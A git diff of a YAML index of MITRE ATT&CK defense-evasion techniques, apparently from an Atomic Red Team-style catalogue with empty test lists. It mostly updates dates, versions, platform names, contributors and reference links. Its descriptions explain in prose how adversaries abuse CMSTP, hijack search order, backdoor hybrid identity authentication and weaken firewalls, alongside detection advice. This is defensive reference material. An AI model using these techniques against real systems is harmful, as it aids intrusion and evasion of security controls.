+      x_mitre_platforms:
+      - Linux
+      - macOS
+      - Windows
       x_mitre_version: '1.2'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_data_sources:
       - 'Process: OS API Execution'
       - 'Process: Process Creation'
@@ -4286,13 +4402,49 @@ defense-evasion:
       - Signature-based detection
       - Static File Analysis
       - Anti-virus
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--4bed873f-0b7d-41d4-b93a-b6905d1f90b0
+      created: '2020-03-06T21:11:11.225Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1497/003
+        external_id: T1497.003
+      - source_name: Joe Sec Nymaim
+        description: Joe Security. (2016, April 21). Nymaim - evading Sandboxes with
+          API hammering. Retrieved September 30, 2021.
+        url: https://www.joesecurity.org/blog/3660886847485093803
+      - source_name: Joe Sec Trickbot
+        description: Joe Security. (2020, July 13). TrickBot's new API-Hammering explained.
+          Retrieved September 30, 2021.
+        url: https://www.joesecurity.org/blog/498839998833561473
+      - source_name: ISACA Malware Tricks
+        description: 'Kolbitsch, C. (2017, November 1). Evasive Malware Tricks: How
+          Malware Evades Detection by Sandboxes. Retrieved March 30, 2021.'
+        url: https://www.isaca.org/resources/isaca-journal/issues/2017/volume-6/evasive-malware-tricks-how-malware-evades-detection-by-sandboxes
+      - source_name: Revil Independence Day
+        description: 'Loman, M. et al. (2021, July 4). Independence Day: REvil uses
+          supply chain exploit to attack hundreds of businesses. Retrieved September
+          30, 2021.'
+        url: https://news.sophos.com/en-us/2021/07/04/independence-day-revil-uses-supply-chain-exploit-to-attack-hundreds-of-businesses/
+      - source_name: Netskope Nitol
+        description: Malik, A. (2016, October 14). Nitol Botnet makes a resurgence
+          with evasive sandbox analysis technique. Retrieved September 30, 2021.
+        url: https://www.netskope.com/blog/nitol-botnet-makes-resurgence-evasive-sandbox-analysis-technique
+      - source_name: Deloitte Environment Awareness
+        description: Torello, A. & Guibernau, F. (n.d.). Environment Awareness. Retrieved
+          September 13, 2024.
+        url: https://drive.google.com/file/d/1t0jn3xr4ff2fR30oQAUn_RsWSnMpOAQc/edit
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1497.003
     atomic_tests: []
   T1218.003:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-09-12T19:35:43.077Z'
       name: 'Signed Binary Proxy Execution: CMSTP'
       description: |-
         Adversaries may abuse CMSTP to proxy execution of malicious code. The Microsoft Connection Manager Profile Installer (CMSTP.exe) is a command-line program used to install Connection Manager service profiles. (Citation: Microsoft Connection Manager Oct 2009) CMSTP.exe accepts an installation information file (INF) as a parameter and installs a service profile leveraged for remote access connections.
@@ -4338,8 +4490,8 @@ defense-evasion:
         external_id: T1218.003
       - source_name: Twitter CMSTP Usage Jan 2018
         description: Carr, N. (2018, January 31). Here is some early bad cmstp.exe...
-          Retrieved April 11, 2018.
-        url: https://twitter.com/ItsReallyNick/status/958789644165894146
+          Retrieved September 12, 2024.
+        url: https://x.com/ItsReallyNick/status/958789644165894146
       - source_name: Microsoft Connection Manager Oct 2009
         description: Microsoft. (2009, October 8). How Connection Manager Works. Retrieved
           April 11, 2018.
@@ -4358,13 +4510,12 @@ defense-evasion:
         url: http://www.endurant.io/cmstp/detecting-cmstp-enabled-code-execution-and-uac-bypass-with-sysmon/
       - source_name: Twitter CMSTP Jan 2018
         description: Tyrer, N. (2018, January 30). CMSTP.exe - remote .sct execution
-          applocker bypass. Retrieved April 11, 2018.
-        url: https://twitter.com/NickTyrer/status/958450014111633408
+          applocker bypass. Retrieved September 12, 2024.
+        url: https://x.com/NickTyrer/status/958450014111633408
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1218.003
     atomic_tests: []
   T1562.002:
@@ -4479,7 +4630,6 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1562.002
     atomic_tests: []
   T1218.002:
@@ -4520,7 +4670,7 @@ defense-evasion:
         url: https://www.welivesecurity.com/wp-content/uploads/2020/06/ESET_InvisiMole.pdf
         description: 'Hromcova, Z. and Cherpanov, A. (2020, June). INVISIMOLE: THE
           HIDDEN PART OF THE STORY. Retrieved July 16, 2020.'
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-03-11T19:01:55.821Z'
       name: 'Signed Binary Proxy Execution: Control Panel'
       description: |-
         Adversaries may abuse control.exe to proxy execution of malicious payloads. The Windows Control Panel process binary (control.exe) handles execution of Control Panel items, which are utilities that allow users to view and adjust computer settings.
@@ -4559,8 +4709,6 @@ defense-evasion:
       - User
       - Administrator
       - SYSTEM
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1218.002
     atomic_tests: []
   T1599.001:
@@ -4583,7 +4731,7 @@ defense-evasion:
         url: https://tools.ietf.org/html/rfc1918
         description: IETF Network Working Group. (1996, February). Address Allocation
           for Private Internets. Retrieved October 20, 2020.
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-10-21T01:45:58.951Z'
       name: Network Address Translation Traversal
       description: "Adversaries may bridge network boundaries by modifying a network
         device’s Network Address Translation (NAT) configuration. Malicious modifications
@@ -4622,12 +4770,10 @@ defense-evasion:
       - 'Network Traffic: Network Traffic Content'
       x_mitre_permissions_required:
       - Administrator
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1550:
     technique:
-      modified: '2024-04-12T21:18:23.798Z'
+      modified: '2024-10-15T16:09:19.001Z'
       name: Use Alternate Authentication Material
       description: "Adversaries may use alternate authentication material, such as
         password hashes, Kerberos tickets, and application access tokens, in order
@@ -4654,6 +4800,7 @@ defense-evasion:
         phase_name: lateral-movement
       x_mitre_contributors:
       - Blake Strom, Microsoft Threat Intelligence
+      - Pawel Partyka, Microsoft Threat Intelligence
       x_mitre_deprecated: false
       x_mitre_detection: 'Configure robust, consistent account activity audit policies
         across the enterprise and with externally accessible services.(Citation: TechNet
@@ -4671,12 +4818,12 @@ defense-evasion:
       x_mitre_is_subtechnique: false
       x_mitre_platforms:
       - Windows
-      - Office 365
       - SaaS
-      - Google Workspace
       - IaaS
       - Containers
-      x_mitre_version: '1.3'
+      - Identity Provider
+      - Office Suite
+      x_mitre_version: '1.4'
       x_mitre_data_sources:
       - 'Application Log: Application Log Content'
       - 'Logon Session: Logon Session Creation'
@@ -4702,18 +4849,17 @@ defense-evasion:
         description: NIST. (n.d.). Authentication. Retrieved January 30, 2020.
         url: https://csrc.nist.gov/glossary/term/authentication
       - source_name: NIST MFA
-        description: NIST. (n.d.). Multi-Factor Authentication (MFA). Retrieved January
-          30, 2020.
-        url: https://csrc.nist.gov/glossary/term/Multi_Factor-Authentication
+        description: NIST. (n.d.). Multi-Factor Authentication (MFA). Retrieved September
+          25, 2024.
+        url: https://csrc.nist.gov/glossary/term/multi_factor_authentication
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1562.004:
     technique:
-      modified: '2024-03-28T00:01:08.337Z'
+      modified: '2024-09-12T19:37:57.867Z'
       name: 'Impair Defenses: Disable or Modify System Firewall'
       description: |-
         Adversaries may disable or modify system firewalls in order to bypass controls limiting network usage. Changes could be disabling the entire mechanism as well as adding, deleting, or modifying particular rules. This can be done numerous ways depending on the operating system, including via command-line, editing Windows Registry keys, and Windows Control Panel.
@@ -4758,13 +4904,12 @@ defense-evasion:
         url: https://www.huntress.com/blog/blackcat-ransomware-affiliate-ttps
       - source_name: change_rdp_port_conti
         description: 'The DFIR Report. (2022, March 1). "Change RDP port" #ContiLeaks.
-          Retrieved March 1, 2022.'
-        url: https://twitter.com/TheDFIRReport/status/1498657772254240768
+          Retrieved September 12, 2024.'
+        url: https://x.com/TheDFIRReport/status/1498657772254240768
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1562.004
     atomic_tests: []
   T1553.003:
@@ -4836,7 +4981,7 @@ defense-evasion:
         * **Note:** The above hijacks are also possible without modifying the Registry via [DLL Search Order Hijacking](https://attack.mitre.org/techniques/T1574/001).
 
         Hijacking SIP or trust provider components can also enable persistent code execution, since these malicious components may be invoked by any application that performs code signing or signature validation. (Citation: SpectorOps Subverting Trust Sept 2017)
-      modified: '2022-05-24T14:00:00.188Z'
+      modified: '2022-05-05T04:58:58.214Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: 'Subvert Trust Controls: SIP and Trust Provider Hijacking'
       x_mitre_detection: |-
@@ -4869,35 +5014,34 @@ defense-evasion:
       - Application Control
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1553.003
     atomic_tests: []
   T1556.007:
     technique:
-      modified: '2022-11-08T14:00:00.188Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: Hybrid Identity
       description: "Adversaries may patch, modify, or otherwise backdoor cloud authentication
         processes that are tied to on-premises user identities in order to bypass
         typical authentication mechanisms, access credentials, and enable persistent
         access to accounts.  \n\nMany organizations maintain hybrid user and device
         identities that are shared between on-premises and cloud-based environments.
-        These can be maintained in a number of ways. For example, Azure AD includes
-        three options for synchronizing identities between Active Directory and Azure
-        AD(Citation: Azure AD Hybrid Identity):\n\n* Password Hash Synchronization
+        These can be maintained in a number of ways. For example, Microsoft Entra
+        ID includes three options for synchronizing identities between Active Directory
+        and Entra ID(Citation: Azure AD Hybrid Identity):\n\n* Password Hash Synchronization
         (PHS), in which a privileged on-premises account synchronizes user password
-        hashes between Active Directory and Azure AD, allowing authentication to Azure
-        AD to take place entirely in the cloud \n* Pass Through Authentication (PTA),
-        in which Azure AD authentication attempts are forwarded to an on-premises
+        hashes between Active Directory and Entra ID, allowing authentication to Entra
+        ID to take place entirely in the cloud \n* Pass Through Authentication (PTA),
+        in which Entra ID authentication attempts are forwarded to an on-premises
         PTA agent, which validates the credentials against Active Directory \n* Active
         Directory Federation Services (AD FS), in which a trust relationship is established
-        between Active Directory and Azure AD \n\nAD FS can also be used with other
+        between Active Directory and Entra ID \n\nAD FS can also be used with other
         SaaS and cloud platforms such as AWS and GCP, which will hand off the authentication
         process to AD FS and receive a token containing the hybrid users’ identity
         and privileges. \n\nBy modifying authentication processes tied to hybrid identities,
         an adversary may be able to establish persistent privileged access to cloud
         resources. For example, adversaries who compromise an on-premises server running
         a PTA agent may inject a malicious DLL into the `AzureADConnectAuthenticationAgentService`
-        process that authorizes all attempts to authenticate to Azure AD, as well
+        process that authorizes all attempts to authenticate to Entra ID, as well
         as records user credentials.(Citation: Azure AD Connect for Read Teamers)(Citation:
         AADInternals Azure AD On-Prem to Cloud) In environments using AD FS, an adversary
         may edit the `Microsoft.IdentityServer.Servicehost` configuration file to
@@ -4905,9 +5049,9 @@ defense-evasion:
         any set of claims, thereby bypassing multi-factor authentication and defined
         AD FS policies.(Citation: MagicWeb)\n\nIn some cases, adversaries may be able
         to modify the hybrid identity authentication process from the cloud. For example,
-        adversaries who compromise a Global Administrator account in an Azure AD tenant
+        adversaries who compromise a Global Administrator account in an Entra ID tenant
         may be able to register a new PTA agent via the web console, similarly allowing
-        them to harvest credentials and log into the Azure AD environment as any user.(Citation:
+        them to harvest credentials and log into the Entra ID environment as any user.(Citation:
         Mandiant Azure AD Backdoors)"
       kill_chain_phases:
       - kill_chain_name: mitre-attack
@@ -4916,21 +5060,22 @@ defense-evasion:
         phase_name: defense-evasion
       - kill_chain_name: mitre-attack
         phase_name: persistence
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_contributors:
+      - Praetorian
+      x_mitre_deprecated: false
       x_mitre_detection: ''
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: true
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
-      - Azure AD
       - SaaS
-      - Google Workspace
-      - Office 365
       - IaaS
-      x_mitre_is_subtechnique: true
-      x_mitre_deprecated: false
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_version: '1.0'
-      x_mitre_contributors:
-      - Praetorian
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'File: File Modification'
       - 'Module: Module Load'
@@ -4970,9 +5115,6 @@ defense-evasion:
         url: https://www.mandiant.com/resources/detecting-microsoft-365-azure-active-directory-backdoors
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 2.1.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1218.015:
     technique:
@@ -5035,7 +5177,6 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1562.012:
     technique:
@@ -5095,7 +5236,6 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1562.012
     atomic_tests: []
   T1207:
@@ -5136,7 +5276,7 @@ defense-evasion:
         description: Lucand,G. (2018, February 18). Detect DCShadow, impossible?.
           Retrieved March 30, 2018.
         source_name: ADDSecurity DCShadow Feb 2018
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-03-08T21:20:04.850Z'
       name: Rogue Domain Controller
       description: |-
         Adversaries may register a rogue Domain Controller to enable manipulation of Active Directory data. DCShadow may be used to create a rogue Domain Controller (DC). DCShadow is a method of manipulating Active Directory (AD) data, including objects and schemas, by registering (or reusing an inactive registration) and simulating the behavior of a DC. (Citation: DCShadow Blog) Once registered, a rogue DC may be able to inject and replicate changes into AD infrastructure for any domain object, including credentials and keys.
@@ -5167,8 +5307,6 @@ defense-evasion:
       x_mitre_permissions_required:
       - Administrator
       x_mitre_is_subtechnique: false
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1207
     atomic_tests: []
   T1553.006:
@@ -5258,7 +5396,7 @@ defense-evasion:
         Escalation](https://attack.mitre.org/techniques/T1068) using a signed, but
         vulnerable driver.(Citation: Unit42 AcidBox June 2020)(Citation: GitHub Turla
         Driver Loader)"
-      modified: '2022-05-24T14:00:00.188Z'
+      modified: '2022-05-05T05:00:03.480Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: 'Subvert Trust Controls: Code Signing Policy Modification'
       x_mitre_detection: 'Monitor processes and command-line arguments for actions
@@ -5282,12 +5420,11 @@ defense-evasion:
       - Application Control
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1553.006
     atomic_tests: []
   T1610:
     technique:
-      modified: '2024-04-11T21:24:42.680Z'
+      modified: '2024-10-15T15:06:17.124Z'
       name: Deploy a container
       description: |-
         Adversaries may deploy a container into an environment to facilitate execution or evade defenses. In some cases, adversaries may deploy a new container to execute processes associated with a particular image or deployment, such as processes that execute or download malware. In others, an adversary may deploy a new container configured without network rules, user limitations, etc. to bypass existing defenses within the environment. In Kubernetes environments, an adversary may attempt to deploy a privileged or vulnerable container into a specific node in order to [Escape to Host](https://attack.mitre.org/techniques/T1611) and access other containers running on the node. (Citation: AppSecco Kubernetes Namespace Breakout 2020)
@@ -5366,7 +5503,6 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1610
     atomic_tests: []
   T1112:
@@ -5451,12 +5587,11 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1112
     atomic_tests: []
   T1574.008:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-09-12T15:25:57.059Z'
       name: 'Hijack Execution Flow: Path Interception by Search Order Hijacking'
       description: |-
         Adversaries may execute their own malicious payloads by hijacking the search order used to load other programs. Because some programs do not call other programs using the full path, adversaries may place their own file in the directory where the calling program is located, causing the operating system to launch their malicious software at the request of the calling program.
@@ -5475,6 +5610,7 @@ defense-evasion:
         phase_name: defense-evasion
       x_mitre_contributors:
       - Stefan Kanthak
+      x_mitre_deprecated: false
       x_mitre_detection: |
         Monitor file creation for files named after partial directories and in locations that may be searched for common processes through the environment variable, or otherwise should not be user writable. Monitor the executing process for process executable paths that are named for partial directories. Monitor file creation for programs that are named after Windows system programs or programs commonly executed without a path (such as "findstr," "net," and "python"). If this activity occurs outside of known administration activity, upgrades, installations, or patches, then it may be suspicious.
 
@@ -5482,7 +5618,6 @@ defense-evasion:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
       x_mitre_version: '1.0'
@@ -5502,29 +5637,31 @@ defense-evasion:
       id: attack-pattern--58af3705-8740-4c68-9329-ec015a7013c2
       created: '2020-03-13T17:48:58.999Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
       external_references:
       - source_name: mitre-attack
         url: https://attack.mitre.org/techniques/T1574/008
         external_id: T1574.008
+      - source_name: Microsoft Environment Property
+        description: Microsoft. (2011, October 24). Environment Property. Retrieved
+          July 27, 2016.
+        url: https://docs.microsoft.com/en-us/previous-versions//fd7hxfdd(v=vs.85)?redirectedfrom=MSDN
       - source_name: Microsoft CreateProcess
-        description: Microsoft. (n.d.). CreateProcess function. Retrieved December
-          5, 2014.
-        url: http://msdn.microsoft.com/en-us/library/ms682425
+        description: Microsoft. (n.d.). CreateProcess function. Retrieved September
+          12, 2024.
+        url: https://learn.microsoft.com/en-us/windows/win32/api/processthreadsapi/nf-processthreadsapi-createprocessa
+      - source_name: Microsoft WinExec
+        description: Microsoft. (n.d.). WinExec function. Retrieved September 12,
+          2024.
+        url: https://learn.microsoft.com/en-us/windows/win32/api/winbase/nf-winbase-winexec
       - source_name: Windows NT Command Shell
         description: Tim Hill. (2014, February 2). The Windows NT Command Shell. Retrieved
           December 5, 2014.
         url: https://docs.microsoft.com/en-us/previous-versions//cc723564(v=technet.10)?redirectedfrom=MSDN#XSLTsection127121120120
-      - source_name: Microsoft WinExec
-        description: Microsoft. (n.d.). WinExec function. Retrieved December 5, 2014.
-        url: http://msdn.microsoft.com/en-us/library/ms687393
-      - source_name: Microsoft Environment Property
-        description: Microsoft. (2011, October 24). Environment Property. Retrieved
-          July 27, 2016.
-        url: https://docs.microsoft.com/en-us/previous-versions//fd7hxfdd(v=vs.85)?redirectedfrom=MSDN
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
-      spec_version: '2.1'
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1574.008
     atomic_tests: []
   T1535:
@@ -5575,7 +5712,6 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1027.001:
     technique:
@@ -5642,12 +5778,11 @@ defense-evasion:
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
-      spec_version: '2.1'
       identifier: T1027.001
     atomic_tests: []
   T1484.001:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-09-23T22:11:01.884Z'
       name: 'Domain Policy Modification: Group Policy Modification'
       description: "Adversaries may modify Group Policy Objects (GPOs) to subvert
         the intended discretionary access controls for a domain, usually with the
@@ -5683,6 +5818,10 @@ defense-evasion:
         phase_name: defense-evasion
       - kill_chain_name: mitre-attack
         phase_name: privilege-escalation
+      x_mitre_contributors:
+      - Itamar Mizrahi, Cymptom
+      - Tristan Bennett, Seamless Intelligence
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         It is possible to detect GPO modifications by monitoring directory service changes using Windows event logs. Several events may be logged for such GPO modifications, including:
 
@@ -5694,16 +5833,12 @@ defense-evasion:
 
 
         GPO abuse will often be accompanied by some other behavior such as [Scheduled Task/Job](https://attack.mitre.org/techniques/T1053), which will have events associated with it to detect. Subsequent permission value modifications, like those to SeEnableDelegationPrivilege, can also be searched for in events associated with privileges assigned to new logons (Event ID 4672) and assignment of user rights (Event ID 4704).
-      x_mitre_platforms:
-      - Windows
-      x_mitre_is_subtechnique: true
-      x_mitre_deprecated: false
       x_mitre_domains:
       - enterprise-attack
+      x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - Windows
       x_mitre_version: '1.0'
-      x_mitre_contributors:
-      - Itamar Mizrahi, Cymptom
-      - Tristan Bennett, Seamless Intelligence
       x_mitre_data_sources:
       - 'Command: Command Execution'
       - 'Active Directory: Active Directory Object Creation'
@@ -5739,12 +5874,12 @@ defense-evasion:
         url: https://wald0.com/?p=179
       - source_name: Harmj0y Abusing GPO Permissions
         description: Schroeder, W. (2016, March 17). Abusing GPO Permissions. Retrieved
-          March 5, 2019.
-        url: http://www.harmj0y.net/blog/redteaming/abusing-gpo-permissions/
+          September 23, 2024.
+        url: https://blog.harmj0y.net/redteaming/abusing-gpo-permissions/
       - source_name: Harmj0y SeEnableDelegationPrivilege Right
         description: Schroeder, W. (2017, January 10). The Most Dangerous User Right
-          You (Probably) Have Never Heard Of. Retrieved March 5, 2019.
-        url: http://www.harmj0y.net/blog/activedirectory/the-most-dangerous-user-right-you-probably-have-never-heard-of/
+          You (Probably) Have Never Heard Of. Retrieved September 23, 2024.
+        url: https://blog.harmj0y.net/activedirectory/the-most-dangerous-user-right-you-probably-have-never-heard-of/
       - source_name: TechNet Group Policy Basics
         description: 'srachui. (2012, February 13). Group Policy Basics – Part 1:
           Understanding the Structure of a Group Policy Object. Retrieved March 5,
@@ -5752,14 +5887,13 @@ defense-evasion:
         url: https://blogs.technet.microsoft.com/musings_of_a_technical_tam/2012/02/13/group-policy-basics-part-1-understanding-the-structure-of-a-group-policy-object/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1484.001
     atomic_tests: []
   T1078.001:
     technique:
-      modified: '2024-03-07T14:27:04.770Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: 'Valid Accounts: Default Accounts'
       description: |-
         Adversaries may obtain and abuse credentials of a default account as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Default accounts are those that are built-into an OS, such as the Guest or Administrator accounts on Windows systems. Default accounts also include default factory/provider set accounts on other types of systems, software, or devices, including the root user account in AWS and the default service account in Kubernetes.(Citation: Microsoft Local Accounts Feb 2019)(Citation: AWS Root User)(Citation: Threat Matrix for Kubernetes)
@@ -5774,6 +5908,7 @@ defense-evasion:
         phase_name: privilege-escalation
       - kill_chain_name: mitre-attack
         phase_name: initial-access
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_deprecated: false
       x_mitre_detection: Monitor whether default accounts have been activated or logged
         into. These audits should also include checks on any appliances and applications
@@ -5782,18 +5917,18 @@ defense-evasion:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
-      - Azure AD
-      - Office 365
       - SaaS
       - IaaS
       - Linux
       - macOS
-      - Google Workspace
       - Containers
       - Network
-      x_mitre_version: '1.3'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '1.4'
       x_mitre_data_sources:
       - 'Logon Session: Logon Session Creation'
       - 'User Account: User Account Authentication'
@@ -5825,14 +5960,11 @@ defense-evasion:
         url: https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.2.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1078.001
     atomic_tests: []
   T1574.006:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-03-30T21:01:40.146Z'
       name: 'Hijack Execution Flow: LD_PRELOAD'
       description: "Adversaries may execute their own malicious payloads by hijacking
         environment variables the dynamic linker uses to load shared libraries. During
@@ -5953,7 +6085,6 @@ defense-evasion:
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
-      spec_version: '2.1'
       identifier: T1574.006
     atomic_tests: []
   T1070.001:
@@ -6027,12 +6158,11 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1070.001
     atomic_tests: []
   T1222:
     technique:
-      modified: '2022-11-08T14:00:00.188Z'
+      modified: '2022-10-19T17:54:06.038Z'
       name: File and Directory Permissions Modification
       description: "Adversaries may modify file or directory permissions/attributes
         to evade access control lists (ACLs) and access protected files.(Citation:
@@ -6129,12 +6259,11 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1222
     atomic_tests: []
   T1548:
     technique:
-      modified: '2024-04-15T20:52:09.908Z'
+      modified: '2024-10-15T15:32:21.811Z'
       name: Abuse Elevation Control Mechanism
       description: 'Adversaries may circumvent mechanisms designed to control elevate
         privileges to gain higher-level permissions. Most modern systems contain native
@@ -6166,11 +6295,10 @@ defense-evasion:
       - Linux
       - macOS
       - Windows
-      - Office 365
       - IaaS
-      - Google Workspace
-      - Azure AD
-      x_mitre_version: '1.3'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '1.4'
       x_mitre_data_sources:
       - 'Process: Process Creation'
       - 'User Account: User Account Modification'
@@ -6211,11 +6339,10 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1134.002:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-04-11T21:14:37.714Z'
       name: Create Process with Token
       description: |-
         Adversaries may create a new process with an existing token to escalate privileges and bypass access controls. Processes can be created with the token and resulting security context of another user using features such as <code>CreateProcessWithTokenW</code> and <code>runas</code>.(Citation: Microsoft RunAs)
@@ -6271,12 +6398,11 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1134.002
     atomic_tests: []
   T1548.001:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-03-15T18:43:20.995Z'
       name: 'Abuse Elevation Control Mechanism: Setuid and Setgid'
       description: |-
